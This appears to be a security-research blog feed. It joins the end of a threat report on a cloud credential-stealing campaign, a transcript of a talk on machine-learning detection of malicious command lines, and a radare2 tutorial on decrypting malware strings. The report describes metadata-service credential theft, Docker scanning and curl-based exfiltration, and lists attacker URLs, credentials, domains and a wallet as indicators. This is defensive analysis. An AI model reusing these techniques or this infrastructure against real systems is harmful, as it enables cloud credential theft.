Uncategorized .env, accounts.xml, api_key, resource.cache, servlist.conf

There is considerable overlap in the targeted files between these credential stealer campaigns and the TeamTNT Kubelet-targeting campaign reported by Sysdig in October 2022.

Arrays containing targeted credential file names in grab.sh
Arrays containing targeted credential file names in grab.sh

The script uses the cred_files function to search for credentials files on the system, write them to a temporary file $EDIS, copy the new file to a master credential-holding file $CSOF, then delete the temporary file. The $EDIS and $CSOF variable file names and paths are randomly generated via the special use Bash variable $RANDOM, meaning the value is an integer between 0 and 32767 that changes each time $RANDOM is accessed.

The cred_files function in aws.sh
The cred_files function in aws.sh

AWS

The new scripts show more attention to making the features modular, a natural evolution as a script becomes more complex. The AWS-specific functionality is driven by a function named run_aws_grabber. Most AWS-centric features from the December campaign have been rolled into one of four functions driven by run_aws_grabber:

  • get_aws_infos: Queries the AWS instance metadata service (IMDS) for IAM configuration and sets the output to $AWS_INFO, as well as security credential configuration from EC2 and IAM resources, which are set to $AWS_1_EC2 and $AWS_1_IAM_NAME, respectively.
  • get_aws_meta: Writes the values from each of the variables generated in get_aws_infos then parses the data for specific values via grep and extracts them using sed, writing the output to the $CSOF variable.
  • get_aws_env: Checks for values in AWS credential related variables, writes them to $CSOF when present. When the $AWS_CONTAINER_CREDENTIALS_RELATIVE_URI is found, the function calls curl against the URL, then modifies the response using sed to format specific values into an aws configure set command. For example, the string AccessKeyId in the response is transformed to aws configure set aws_access_key_id. The actor likely chose to format the values as a command so that the output feeds into additional automated actions.
The get_aws_env function in aws.sh
The get_aws_env function in aws.sh
  • get_awscli_data: This function is only implemented in the two most recent versions: the function exists in the 6/15/2023 version of aws.sh, but it is not called. The function invokes aws sts get-caller-identity to collect the 12-digit AWS account identifier and writes the result to $CSOF.

Azure & GCP

A notable recent addition is logic specific to the Azure and Google Cloud platforms. The get_azure and get_google functions are implemented in the newest versions seen on 06/26/2023; the logic was present in the 6/15 campaign, but the functions were not called. These changes indicate that these features are being actively developed, so we expect more changes as the actors roll out and test these features.

Newly implemented get_azure function in g.aws.sh
Newly implemented get_azure function in g.aws.sh

System Profiling

The attackers now perform system profiling through the aws.sh scripts as well as other scripts delivered under certain conditions. Another new feature is the get_docker function, which checks if the environment is a Docker container. When it is, the function runs docker inspect against each running container and saves the result to $CSOF. The output will not necessarily have credentials and this likely serves as a mechanism for system profiling.

Additionally, the new version added the function get_prov_vars, which calls cat /proc/*/env* to collect environment variable details from each running process and writes the result to $CSOF. The actor likely does this to enumerate other valuable services running on the system for manual targeting.

We also observed profiling activity from Data.sh, a post-exploitation script that collects details from the system and sends it to the attacker’s server. The script uses Bash to craft a web request to download the curl binary from the attacker’s server through the bashload function. This is notable because attacks against minimal systems–such as containers–can be limited by the absence of ubiquitous binaries like curl.

The bashloadfunction in Data.sh
The bashload function in Data.sh

The attacker sets variables for a lockfile and datafile in /var/tmp. The result of the following reconnaissance commands is written to the datafile:

whoami Current user
ls -al Lists all files in the current directory
who List of users with active terminal sessions
lastlog Log of user login history
cat /var/spool/cron/* Contents of configured cron jobs
ps aux Details about all running processes
netstat -anop Network connection and socket details
docker ps List of Docker containers, including stopped containers

The script then sends the results collected in the datafile to the C2 using curl with a provided username and password.

Credentials Exfiltration

After collecting and processing the credentials, the credentials stealing scripts use curl to exfiltrate the contents of the $CSOF file to an AnonDNS-hosted server. The script contains hardcoded credentials that are used to authenticate the request. The June 2023 campaigns use the following username, password, and server URL combinations:

SHA1 5611cb5676556410981eefab70d0e2aced01dbc5
Name aws.sh
Username jegjrlgjhdsgjh
Password oeireopüigreigroei
Exfil URL http[:]//everlost.anondns.net/upload.php
SHA1 61da5d358df2e99ee174b22c4899dbbf903c76f0
Name aws.sh (newer)
Username 1234
Password 5678
Exfil URL http[:]//silentbob.anondns.net/insert/keys.php
SHA1 ac78d5c763e460db2137999b67b921e471a55e11
Name g.aws.sh
Username 1234
Password 5678
Exfil URL http[:]//ap-northeast-1.compute.internal.anondns.net/insert/keys.php
SHA1 dba0dcb8378d84abc8f7bf897825dd4f23e20e04
Name data.sh
Username 8765
Password 4321
Exfil URL http[:]//everlost.anondns.net/data.php
The send_data function from g.aws.sh
The send_data function from g.aws.sh

Propagation

In addition to the usual shell scripts, we observed the actor delivering a UPX-packed, Golang-based ELF binary. The binary ultimately drops and executes another shell script that scans an actor-specified range and attempts to propagate to vulnerable targets. We believe the reason the actor used this binary to deliver yet another script is due to the relatively noisy nature of the scanning activity. The scanner is hidden as an embedded base64 object within the packed Golang binary, adding more stealth than a standalone shell script. Additionally, the binary drops Zgrab–a Golang network scanning tool–which depends on Golang environment variables that are set by running the parent Go binary.

The implemented code enables the binary to read a command from a string and execute it using os_exec.

The main_main function
The main_main function

The main_main function decodes an embedded base64 blob, resulting in a Bash script that is written and then executed by the main_runCommand function. In the embedded script, the setupsomething function downloads the following packages on systems using the Yum package manager:

  • Compiler and code processing: gcc make git jq
  • Network utilities: libpcap libpcap-devel curl

This function also downloads the following packages on systems that use the Apt package manager:

  • Compiler and code processing: gcc make git jq
  • Network utilities: libpcap0.8 libpcap0.8-dev masscan curl

Next, setupsomething checks if masscan, docker, and zgrab are installed. If not, the script downloads the dependencies from the attacker’s server, hosted at the URI: /bin/[bin_name].

The dAPIpwn function takes the following arguments:

  • IP range: collected from the C2 server at /gr.php
  • Ports: 2375, 2376 – respectively used for Docker unencrypted and encrypted communications
  • Rate: 500,000 packets per second

The function passes these arguments to masscan, which scans the specified IP ranges then passes the results to zgrab, which looks for http responses from the remote endpoint /v1.16/version. The output is filtered using grep to search for lines containing the strings 'ApiVersion' or 'client version 1.16'. Aqua also detailed a step in the attack chain that looks for misconfigured Docker daemons running version 1.16. Interestingly, a Shodan search revealed only apparent honeypot systems responding with these strings on the specified ports.

When a system is deemed vulnerable, the script calls back to the C2 using curl with the vulnerable IP address and port added to the request URI.

Embedded script that scans for vulnerable Docker instances
Embedded script that scans for vulnerable Docker instances

Conclusion

This campaign demonstrates the evolution of a seasoned cloud actor with familiarity across many technologies. The meticulous attention to detail indicates the actor has clearly experienced plenty of trial and error, shown in choices like serving the curl binary to systems that do not already have it. The actor has also improved the tool’s data formatting to enable more autonomous activity, which demonstrates a certain level of maturity and skill.

While AWS has long been in the crosshairs of many cloud-focused actors, the expansion to Azure and GCP credentials indicates there are other major contenders holding valuable data.

We believe this actor is actively tuning and improving their tools. Based on the tweaks observed across the past several weeks, the actor is likely preparing for larger scale campaigns. The lack of threats explicitly targeting Azure and GCP credentials up to this point means there are likely many fresh targets. The current focus on Docker is ultimately arbitrary: this actor has previously targeted other technologies and there are many other oft-forgotten vulnerable applications.

Organizations can prepare against these attacks by ensuring that applications are configured properly and patched as security fixes become available. Docker access should be restricted to suit your organization’s needs while reducing exposure from outside connections.

Indicators of Compromise

SHA1 Description
0e1805fd9efa6a1c3fe9adb3f34373a9dcc7fe19 run.sh
18d28ac44c5501f1768f0fc155ad38aa56610881 chattr ELF binary
27414df2f9a687db65d2bc5fed011a1f0f550417 aws.sh v3
2ed9517159b89af2518cf65a93f3377dea737138 UPX-packed Golang ELF binary that drops scanner script
37cb34a044c70d1acea5a3a91580b7bfc2a8e687 ELF binary, potentially Tsunami
3d6aaed47135090326780727fef57ce1c1573aa2 tmate.sh
5611cb5676556410981eefab70d0e2aced01dbc5 aws.sh v2
6123bbca11385f9a02f888b21a59155242a96aba user.sh
61da5d358df2e99ee174b22c4899dbbf903c76f0 aws.sh v5
63fe964140907470427e035bdba5230f6a302056 b.sh (Install script)
654be7302f4a3638929fe5e67f6f2739a1801b07 clean.sh
828960576e182ec3206f457a263f25ee0531edbb curl.full
863bf9617f82c9c595cc9b09e84a346a306060c2 Embedded script from binary with dAPIpwn function capability
8802f1bf8f83e354f14686fe79b5018cd36eb77f aws.sh v6
ac78d5c763e460db2137999b67b921e471a55e11 aws.sh v4
b13d62f15868900ab22c9429effdfb7939563926 aws.sh v7
c9edc82bc3ac344981231965bedec300fec31b1f xc3.sh
d79970f66a56f69667284c4c937f666758200ab4 grab.sh
dba0dcb8378d84abc8f7bf897825dd4f23e20e04 data.sh profiling script
eb3dff13ed97670e06649e8daaa6e4ab655477f6 aws.sh v1
f437aeac3721a0038c936bab5a2ac1ccdb0cf222 int.sh

Monero Wallet address, C3Pool XMR

43Lfq18TycJHVR3AMews5C9f6SEfenZoQMcrsEeFXZTWcFW9jW7VeCySDm1L9n4d2JEoHjcDpWZFq6QzqN4QGHYZVaALj3U 

Domains

ap-northeast-1.compute.internal.anondns[.]net
everlost.anondns[.]netsilentbob.anondns[.]net
everfound.anondns[.]net

IPv4s

207.154.218.221
45.9.148.108

URLs

http[:]//silentbob.anondns.net/bin/chattr 
http[:]//silentbob.anondns.net/bin/a 
http[:]//silentbob.anondns.net/cmd/grab.sh 
http[:]//silentbob.anondns.net/cmd/clean.sh 
http[:]//silentbob.anondns.net/cmd/aws.sh 
http[:]//silentbob.anondns.net/cmd/xc3.sh 
http[:]//silentbob.anondns.net/bin/sysfix/curl.full 
http[:]//silentbob.anondns.net/bin/chattr 
http[:]//silentbob.anondns.net/insert/gscat.php 
http[:]//silentbob.anondns.net/insert/tmate.php 

LABScon Replay | Quiver – Using Cutting Edge ML to Detect Interesting Command Lines for Hunters

By: LABScon
26 June 2023 at 13:16

What do GPT3, DALL-E2, and Copilot have in common? By grasping the structure and nature of language, these projects can generate text, images, and code that provide added value to a user.  Now, they even understand command lines!

Quiver – QUick Verifier for Threat HuntER – is an application aimed at understanding command lines and performing tasks like Attribution, Classification, Anomaly Detection, and many others.

DALL-E2 is known to take an input prompt in human language and draw a stunning image with impressive matching results; GPT3 and similar projects can create an infinite amount of text seemingly written by a real person, while Github’s Copilot can generate entire functions from a comment string.

Command lines are a language in themselves and can be taught and learned the same way other languages can. And the application can be as versatile as we want. Imagine giving a command line to an input prompt and getting the probability of it being a reverse shell, by an Iranian actor, or maybe used for cybercrime. A single prompt on its own may not help so much, but with the power of language models algorithms, the threat hunter can have millions of answers in a matter of minutes, shedding a light on the most important or urgent activities within the network.

In this session, Dean and Gal demonstrate how they developed such a model, along with real-world examples of how the model is used in applications like anomaly detection, attribution, and classification.

Quiver – Using Cutting Edge ML to detect interesting command lines for Hunters: Audio automatically transcribed by Sonix

Quiver – Using Cutting Edge ML to detect interesting command lines for Hunters: this mp4 audio file was automatically transcribed by Sonix with the best speech-to-text algorithms. This transcript may contain errors.

Dean Langsam:
So first of all, I need to say that our code is in Jupyter Notebooks and PyTorch. So if any one of you want to see the code, just use wheels, exploits and we'll be good. Okay, so this is Quiver. I think I did. We did. Gal and I. Let's begin those three logos or logos for three fairly new tools, although they're pretty famous. The first one is Dall-e two. The second one is GPT three and the and the third one is GitHub copilot. And let's start with some examples.

Dean Langsam:
So Dall-e two can create an image from text. In that example, we can see a cybersecurity researcher sitting on a beanbag in front of a pool in the desert in a fancy hotel trying to reverse engineer a nation state malware, working on a presentation in a realistic style. So that's you guys. If you can connect with that one, maybe this is you guys as you can see, it's not very good with text, but you are all cyber security researchers.

Dean Langsam:
GPT three or GPT three is a model that can generate text. It's applications in cybersecurity. Don't really need to read that. What you need to know is that except for the I've written only the gray part and GPT three created the rest.

Dean Langsam:
In the same manner GitHub copilot. I like,this is code that I actually use just some authentication stuff. And when I've written that I just I was just starting to use GitHub copilot and I like only the gray parts or the parts that I've actually typed in and GitHub copilot did the rest for me. You can see that even you have the function that like I made a typo, I called it anonymized password and like it understood that I mean to anonymize the password.

Dean Langsam:
Okay, so what's common to all those models? All those models understand language. They share language. Common language features between users or between applications. And part of the learning process is unsupervised, a term that we'll speak about later. The question is, can we do the same for the language of command lines? And the answer is yes, but well, no. So currently you're thinking like, what am I doing here? I came to a cybersecurity conference and we're here to talk about deep learning. Gal and I are not, firstly, cybersecurity people. We are coming from the field of machine learning and deep learning, and we try to get a free trip to Phoenix. So we managed to.

Dean Langsam:
We're going to talk about the problems we had with command lines before then. What changed that made this one possible. Then about our package Quiver, which as you've seen, the acronym came first. And eventually we'll show the big show of what we've got. This is Gal.

Gal Braun:
So I'm. Gal. Staff data scientist in SentinelOne for the last six years. A father of two. And Breaking Bad is the best show ever.

Dean Langsam:
And we are mostly the same person. I'm Dean. I'm a Staff data scientist in SentinelOne for three years, actually. Gal got me into the company. I'm a father of one, and Breaking Bad is the best show ever. Except maybe The Wire.

Dean Langsam:
So because we're not in a deep learning conference, let's do like a few minute intro to machine learning and deep learning. What you see here are cats and dogs, and those are called samples. We want to create an algorithm that can distinguish between cats and dogs.

Dean Langsam:
One way they try to do this before is like with algorithms that people are trying to generate. Maybe if it has like the ears are, the ears are that way and the tail is that way, maybe it's a cat, maybe it's a dog. And it was a very hard problem. Even a person couldn't tell you like, why the why am I seeing a cat or a dog in this picture? I just like when you know, you know.

Dean Langsam:
So we try to make this in deep learning. We just show the the computer, the algorithm, many examples of cats and dogs. This is called tagging or labeling. And you can go into Google and just type like give me pictures of dogs. Those would be the green ones and then give me pictures of cats. Those will be the red ones. And then you show the algorithm enough samples and it will create an algorithm using what we call training.

Dean Langsam:
Then when you give it a new sample, the gray one, you, you, you don't tell the algorithm which one it is, which one it is, and you put it in the algorithm and the algorithm spits out, well, this is a cat in the same fashion. It says, This is a dog. Now, that was a pretty easy problem because you could search that on Google, like, give me cats, give me dogs. Enough people tagged cats and dogs in the history of time.

Dean Langsam:
Um, but as my friend John Naisbitt, I know he's not actually my friend, but he's a very famous person. He told "We are drowning in information, but we are starved for knowledge". Like all of us have a lot of stuff, like pictures of things, command lines, language, many things. So what we have, we have many command lines in SentinelOne. The thing we don't have is tag data or label data. The people that can actually do tagging for label data like saying is this command line bad or good or bad? The green ones are good. The red ones are bad. Most of the people that can actually label the data for us are in the in this room.

Dean Langsam:
So I could ask you guys, instead of listening to the talk, give me ten minutes of your time and start tagging data for me. But that is very manual process and that would not scale up.

Dean Langsam:
So what changed? Well, in the old time, meet Mimi. Mimi Katz. She's. She's Jewish like us. And she has a task. Separate, like she gets many papers and we tell her separate those papers between, like, stuff about cyber security and stuff about machine learning. Even if she doesn't know, like, the two concepts, maybe she can try to distinguish between the two. The problem is that the papers are in Hebrew and she doesn't know Hebrew, so she could maybe try and do so. If you give her like thousands of examples, maybe she can try and understand the hieroglyphs of Hebrew and try to understand which hieroglyphs are machine learning and which hieroglyphs are cybersecurity. But that that would again not scale up.

So instead we can introduce a baby. This is a Wonak or Wonak Cry. Won also doesn't speak Hebrew. He doesn't speak any language. He's a baby. But what what he does have is time because he's a baby and people are speaking Hebrew and English next to him all the time. Where does it meet us? Well, this is the old way.

Dean Langsam:
We used to do things like the first one is task one. Give the student a task to distinguish between two things, then give another student its task to distinguish between two other things. A baby can do something else. We can try and give it books like first, understand language, understand what's Hebrew, understand the relationships between words. Just understand the language. Then when you give them tasks, we can give them a lot less data to learn on the tasks instead of like giving it like the whole history of data for each different task. And you're probably starting to understand where we're going with this.

Dean Langsam:
This is again a Quiver and what quiver understands it can do is that Quiver is the baby. We have again in SentinelOne. We don't have a lot of labeled data about command lines, but we have a lot of command lines. So we can just ask Quiver, well, start reading those command lines and start to understand the language of command lines. Of course, this is not as very simple. We have many command line languages and stuff like that, but basically you can just tell it like start reading command lines.

Dean Langsam:
Um, the way we do this is by, I think we call the masked language model. And basically we give it like a sentence and then we hide one of the words or a few of the words and then we can try it like tell it based on that sentence with the hidden word, try to predict that word. That's the way the model learns. This is how we create like, we virtually create labeled data for the task of learning the language.

Dean Langsam:
Ah, now, now, when we learn the language, we can deploy it into different tasks such as like, classify, classify between different executables. We can do anomaly detection. We can of course try to do distinguish between malicious and benign command lines and so on and so forth.

Dean Langsam:
That's, of course, like we have a saying in the data community that given infinite time and infinite data, the model, will learn everything, but unfortunately we don't have infinite time or data. So we try to help our models. In our specific case, we try to take the command line wisdom and deploy some regex rules on it. So you can see that we are trying to mask different directory paths. We try, we, we, we can understand when we are seeing a local IP or a public IP, we can see when we have base64 strings and all those kinds of rules that we've created to help our model.

Gal Braun:
So given that we have this data set of command lines that we pre-processed and we want to feed it to the model, and now eventually, as we mentioned before, the model receives numbers, it needs somehow to translate these strings into vector of numbers that it can can process. So the building blocks of language, which is in our domain called tokens. Let's see how we can extract them.

Gal Braun:
So there are several approaches and the main one will be to dissect these strings into words by using several separators like slashes or whitespaces, which is great if you want to keep the high level entities. For example, argument names, you see that the argument name is still intact, but it makes our lives a little bit difficult when we want when we tackle new strings. For example, if we see a new command line with a new argument name, we need to handle it somehow because we don't see it in our vocabulary.

Gal Braun:
So a different approach will be. Just to split the whole command line into single characters and single chunks, which is the minimum amount which from one. So it mitigates the issue of unknown data that we we tackle. But it, it, it makes it more difficult to understand the higher level entities. And it will take the model a lot, a lot more time to learn.

Gal Braun:
So there is the middle ground, some cool concept that was popped up several years ago which called Subwords. And I won't get in too much into details how it's happening, but it allows us to dissect the text into generic blocks.

Gal Braun:
You can see that these hashtags double hashtags in some of the tokens, which mean it's an end of a word or a start of a word. And it's it's it gives us the, the, the, um, the good parts of both worlds.

Gal Braun:
So what we good output are some things we can can extract with these models is feeding them text for example, like a single token or a whole command line. And we can extract some vector of numbers that we can use for different tasks. And actually, as mentioned before, we are taking this command lines feed it to a model which learn the general way semantics about the command lines and then fine tune it to specific tasks. And during this learning phase it's optimizing some – it's called weights, some numbers inside of this model which will be different for each kind of the tasks so we can extract command lines, representations based on specific tasks that we are interested in.

Gal Braun:
Okay. This was an intro about the core concepts of this model and how it works. And let's see some examples of the output of the results that we got. So here's a nice blob. And we took millions of command lines and fed it to some model and let it just learn the semantics of command lines. Each one of these dots that you see here is a single token from the text that that the model extracted.

Gal Braun:
Now we can take a take a look inside of these tokens and see if it understands some semantics about the command lines. Each each one of the dots is a vector and this is a two dimensionality reduction of the results. So for example, here you can see a minus no profile token, which is a known PowerShell argument. On the left side, you can see it's a zoom in to the specific space location of minus, no profile inside of these tokens representations. And as you can see on the right, you can see that no profile and a token and the green ones are the ones that was mathematically the closest one to it. And on the right and the small table is the five, the most the five most closest tokens to the specific token.

Gal Braun:
As you can see, the top three, which was the closest ones, are different PowerShell arguments or syntax, which is awesome because it really understands something about tokens from PowerShell, PowerShell command lines and the bottom two is not related straight straight to PowerShell, but it's a different arguments. For example, the second from the bottom is a Java argument which again symbolizes that it learns something about arguments to executables, which is nice.

Gal Braun:
A second example regarding that is a different token, which is double hashtag dot VBS quotes, which means the end of a file path inside of an argument value. And as you can see in a similar way, you can see that the top three ones are different VBS tokens, but the rest of them are in the exactly in the same patterns but with different file extensions.

Gal Braun:
So it's dot js, dot bat, PL, JAR and so on. And it really understand that these patterns, these tokens are related inside the same space and give it similar vector numbers and which eventually led us to the conclusion, okay, we have something, it's not totally random and, and we can try and take this model and fine tune it to some task that we want.

Gal Braun:
So, so the most obvious thing that we can think about was trying to teach the model, whether a specific command line is malicious or benign. And what we did is, okay, so we have this baseline language model that learned the general semantics, but we want to fine tune it to this specific task. So firstly, we need some labels. Sentinelone got an MDR service which called Vigilance, which basically going through different cases, different threats that's happening in our customers computers and decide if a specific case is malicious or benign. And we use these cases to try and decide and extract some command lines that we know it would be malicious and vice versa.

Gal Braun:
So here you can see PowerShell command line from a specific malicious threat that was happening and the model actually signed it as malicious, which is cool. But these kind of models let you extract something even more, even more fruitful. You can. Try and extract for each one of the tokens how much it supported to the to the decision if a command line was malicious or benign.

Gal Braun:
So, for example, you can see here the different parts, that led the model to to decide this classification. So for example, here you can see the invoke web request inside of this PowerShell and some parts of the URL cause it to think this command line is malicious.

Gal Braun:
In a similar way here. Another two examples. The the middle one is another PowerShell malicious command line that the model decide what it was. It was malicious and you can see on the areas it focusing like for example, the non interactive token or there's like a it's a little bit faded but the sleep function in the end of of the PowerShell command line which it learned from the data that we fed it, what is malicious and might cause it to be a malicious command line.

Gal Braun:
And the third third example is a benign, entirely benign command line. It's just a win word exe executable that gave in some file path. And the model think it's very, very sorry, I didn't explain that the red parts are saying it's more malicious and the green ones led it to think it's more benign. And you see that the the the fact that the win word is the name of the executable and some string parts in the file name cause it to think it's it's a benign command line.

Gal Braun:
And so what can we do with this this model besides just predicting on a single command line? So firstly, we can just take this model and even if it's not 100% accurate and take it and just throw every command line from a customer environment through this model so it might have mistakes, but it can help us as hunters, for example, find our blind spots, reduce this, this all the areas that we might miss because there's a bunch of threats, a lot, a lot of information just going through our customers and environments.

Gal Braun:
And we have to focus somehow. So this tool can help hunters to focus on the areas that they might missing. And from other aspect, this kind of explanations to understand what causes these command lines to be more malicious or more benign can help us understand our customers information and make conclusions. And even, for example, we can try and let's write a YARA rule that specific fits for these kind of patterns that we see in on malicious command lines or, for example, command lines that the model usually think it's more malicious.

Gal Braun:
So this was one example. And the second one that we wanted to talk about was executable classification. And what we did is take our millions of command lines and split them by arguments and executable. And we fine tune the model to try and given a set of arguments to tell me which executable is it.

Gal Braun:
So another piece of art on the right side. You can see each one of these dots is another reduction to the dimensions of an argument, a set of arguments. And the color is the is the executable. And as you can see, this representation is is is excellent, is actually is very, very good. And most of the clusters are very uniform, which means it actually learns something about which arguments are relevant to which executable. And there are even more interestingly, there are clusters that are not unified which make us think, what are these clusters and what are these interesting command lines that look like different executables.

Gal Braun:
So here is just to have some a little bit more practical examples. You can see some of the clusters like main executable, like CMD or VPC, and actually a cool byproduct you can see at the top like three browsers, different browsers that arose in different clusters but was around the same area in these n-dimensional space. And but you can try and extract some cool information from these clusters, for example, some intent here, for example, a cluster that was based from mostly communication executables, or here you can see a cluster that most of the arguments inside was like Java arguments and one cmd. And if you print this cmd command line, it was actually execution of a Java, which is it actually makes sense. But this tool can be used to try and tag and understand the intent of specific command line without even looking at it. You can try and use this model to try and see a new command line that fell inside of one of these cluster to try and predict, okay, this cmd.exe, it did something that we know is maybe executing Java.

Gal Braun:
And and the last example here is you can see this big giant cluster is full of different PDF readers. And on the bottom you can see two example of CMD and MSEDGE that also opened PDF files and which again we can understand that these clusters, these representations in this cluster and we can tag it with some nice intent and try and predict for a specific command line.

Gal Braun:
So I'm sure that there is at least one person in this audience that think, do this stuff, can do, can solve this thing with regex, sit and try and, and write sophisticated patterns. But the awesome part of this model is just feed them a bunch load of data. You don't need to really fine tune it specifically for the task that you want. And as we mentioned, I think it was like the first day. More and more there are more and more attack vectors for third parties executables and this thing, if you like, keep feeding it more and more data, it will understand better the semantics of command line and easily can be fine tuned to the task that we want. And if the results would won't be good, we still have a saved spot in art school. And. And that's it. Thank you. Any questions?

Speaker3:
Yeah. Have you found any, like, openly available databases, systems with tons and tons of points relevant to this community that we could use for our own? Play on Machine learning and.

Gal Braun:
Do you mean? Like given these representations that were created, whether we found something that we can publish to the community and use it?

More like. Say I don't have the entire database of SentinelOne data to work against, but I do want something to put it against that threat. Researcher. Is there anything, any direction you would push me?

Dean Langsam:
Yeah. So this is currently like only the research phase, but the same way you can use Dall-e two. Although you're not an artist, probably we've never met. You're not an artist, you're not a poet, but you can use GPT three and you can use Dall-e two. Once we have like a working model, it should understand even like new stuff that are in that domain. So even if you give it like a new command line, if we trained it well, if you give it a new command line, it could say like the things that we've taught it to say in that way, if it if we prove it successful and actually good, then yeah, of course we can can do it.

Dean Langsam:
And one of the things that is fairly new in our world is that like Dall-e two is one specific implementation of a bigger academic paper that's called clip. And basically the thing that the most special thing that Dall-e two had is the data itself. But it gives you the data. Now if you say I have more data, I can start from that model. The model itself is open, open source. You can start from that model and train it on your own. I probably take you a lot of time. You need many GPUs, but like it's available to you. It's just a question of like time and money and not. Um, like a proprietary stuff and stuff like that. Yeah. So.

Gal Braun:
So it depends. It depends what you exactly want to achieve. Because overfitting it sounds like it's the worst nightmare for every data scientist, but it might be good for you if you specific want to find an abnormal activity in a specific customer. If you want the model to be fine tuned for a specific customer and extract information. It depends on the applications. And but yes, exactly.

I think one of the reasons we thought about, for example, normalizing paths or local IPS or base64, it was to ease the training. But also let's don't not fine tune into a specific IP or specific directory names so the road is still long before you get to something very mature that we can like publish publicly. But um, but yes, it's something that needs to be thought about and, and beyond that, like PII, for example, let's not give some attacker a option to my IP is something and it will complete it to some DNS server or whatever, something that's important to the customer. And. But yeah. Things to think about. Yeah.

Dean Langsam:
Uh, we're not product people. So once we show it to like the PMs, if they like it, like, as has shown, the part with the green and red parts is very cool to us. We'll customers find it useful. That's not on us, I think. I think it will be cool to show it, but again, the PMs will decide.

Thank you, guys.

Sonix is the world’s most advanced automated transcription, translation, and subtitling platform. Fast, accurate, and affordable.

Automatically convert your mp4 files to text (txt file), Microsoft Word (docx file), and SubRip Subtitle (srt file) in minutes.

Sonix has many features that you’d love including powerful integrations and APIs, collaboration tools, automated translation, automatic transcription software, and easily transcribe your Zoom meetings. Try Sonix for free today.

About the Presenters

Gal Braun is a data scientist at SentinelOne, working on Data Science & Machine learning focused on explainability, representation learning, and visualizations.

Dean Langsam is a data scientist at SentinelOne, working on the intersection of data science, machine learning, deep learning, language models, Python scientific programming, data visualizations, and Bayesian modeling.

About LABScon

This presentation was featured live at LABScon 2022, an immersive 3-day conference bringing together the world’s top cybersecurity minds, hosted by SentinelOne’s research arm, SentinelLabs.

Keep up with all the latest on LABScon 2023 here.

Automating String Decryption and Other Reverse Engineering Tasks in radare2 With r2pipe

21 June 2023 at 13:52

In the previous post in this series, we looked at powering up radare2 with aliases and macros to make our work more productive, but sometimes we need the ability to automate more complex tasks, extend our analyses by bringing in other tools, or process files in batches. Most reverse engineering platforms have some kind of scripting engine to help achieve this kind of heavy lifting and radare2 does, too. In this post, we’ll learn how to drive radare2 with r2pipe and tackle three different challenges that are common to RE automation: decrypting strings, applying comments, and processing files in batches.

Scripting radare2 with C, Go, Swift, Perl, Python, Ruby…

No matter what language you’re most comfortable working in, there’s a good chance that r2pipe supports it. There are 22 supported languages, though they are not all supported equally.

Programming languages supported by radare2’s r2pipe
Programming languages supported by radare2’s r2pipe

C, NodeJS, Python and Swift are the most well-supported languages, but I tend to use Go for speed and brevity, and it lets me hack scripts together rather haphazardly to achieve what I need. When scripting your own reversing sessions, there’s little need to worry about the niceties of programming style or convention as we would do when shipping code for production or other purposes. Although performance can be improved by doing things in one language rather than another, that’s something I rarely need to worry about in practice in my reversing work.

All that’s a preamble to saying that you can – and probably should! – write better scripts than those I’ll show here, but these examples will serve as a good introduction to how you can easily hack your way around problems thanks to r2’s shell integration to get a working solution without worrying too much about “the right” or “the best” way to do it.

Automated String Decryption in OSX.Fairytale

We’ll use a sample of OSX.Fairytale to illustrate automated string decryption. Though I’ll be using Go, you can easily apply the same techniques in whatever other language you prefer.

Like many simple malware families, Fairytale encrypts strings with a combination of base64 and a hard coded XOR key. In this case, the XOR key is 0x30.

OSX.Fairytale uses 0x30 as a hard coded key for XOR decryption
OSX.Fairytale uses 0x30 as a hard coded key for XOR decryption

Once we have determined the XOR key, there’s various simple ways to decrypt a given string or even the whole binary (e.g., cyberchef, or writing your own decryption function), but our eventual aim is to add comments to the disassembly (as well as learn a few useful tricks), so we’ll take a different approach.

Note that radare2 comes with a useful little tool called rahash2 , which among other things, can decrypt strings. Here’s an example you can run on the command line:

% rahash2 -D base64 -s 'H1JZXh9cUUVeU1hTRFw=' | rahash2 -D xor -S 0x30 -
/bin/launchctl%

As we discussed in the previous post, we could easily make this into a function in our .zshrc file. However, one drawback with that approach is r2 won’t let us call such functions from the r2 prompt. We can solve that by creating a standalone executable and saving it in our path, like so:

#!/bin/zsh
if [ "$#" -eq 2 ]; then
	echo $(rahash2 -D xor -S $1 -s $2)
elif [ "$#" -eq 3 ]; then
	echo $(rahash2 -D base64 -s $3 | rahash2 -D xor -S $2 -)
elif [ "$#" -eq 1 ]; then
	echo "
		  # USAGE:
			# rxorb
			# rxorb 0x30 "\|YRBQBI"
			# Use '-b' to base64 decode the string before the xor
			# rxorb -b 0x30 FXAffFlSQlFCSR98UUVeU1hxV1VeREMfFXAeQFxZQ0Q=
		"
else
	echo "INPUT ERROR, type 'rxorb help' for help."
fi

Saving this as /usr/local/bin/rxorb and giving it executable permissions (e.g., via chmod +X) will now make this available to us both on the command line and from within r2, once we open a new shell and new r2 session.

Calling rxorb from within r2 to decrypt individual strings
Calling rxorb from within r2 to decrypt individual strings

Great, we now have a general string decryption tool that we can feed a string, a key and cipher text and we are able to specify whether the cipher needs to be base64 decoded before being XOR’d with the given key. This alone will take care of a lot of use cases!

However, while this works well for manual decryption, it becomes tedious for anything more than a few strings. What would be much better is if we could simply type one command that would iterate over encrypted strings in the binary and either print out all the decrypted text or comment the code where the string is referenced. Ideally, our solution should give us the option to do both.

Let’s see how we can implement that by leveraging radare2’s scripting engine, r2pipe (aka r2p).

Building the Script

We’ll call the Go program “decode.go”, and the first part of it requires importing the r2pipe package from github.

package main                                            
import (
  "fmt"
  "github.com/radareorg/r2pipe-go"
)

var r2p, _ = r2pipe.NewPipe("") 	// Declare r2p as a global

func check(err error) {
     if err != nil {
	panic(err)
     }
}

After the imports, we declare a global variable r2p, which provides a pipe to the r2 instance when we call it from within an r2 session. This global will allow us to send and receive commands to the r2 session. We also implement a generic error function for use throughout the code.

Next, we’ll implement a decrypt function. We could (and probably should) write a native version of this, but since we already have a decrypt function using rahash2 above, we’ll reuse that. This will also allow us to see and solve some other common challenges we might face in other scenarios.

func decryptStrAtLoc(loc string, key string) {
     bytes := fmt.Sprintf("ps @ %s", loc) 		// [1]  
     str, err := r2p.Cmd(bytes)
     check(err)
     decodeCmd := fmt.Sprintf("!rxorb -b %s %s > /tmp/rxorb.txt", key, str) // [2]
     r2p.Cmd(decodeCmd)
} 

The decryptStrAtLoc() function does most of the work in our program. As parameters, it takes an address and the XOR key. We’ve chosen not to return the decrypted string to the caller but instead consume it within the function. We’ll see why shortly.

For each command we want to pass to the r2 session, we first format the command as a string, then pass the command to r2p. Thus, [1] formats a command that returns the bytes at the current address as a string. At [2], we format a command that decodes the string by passing it to the rxorb utility we wrote earlier.

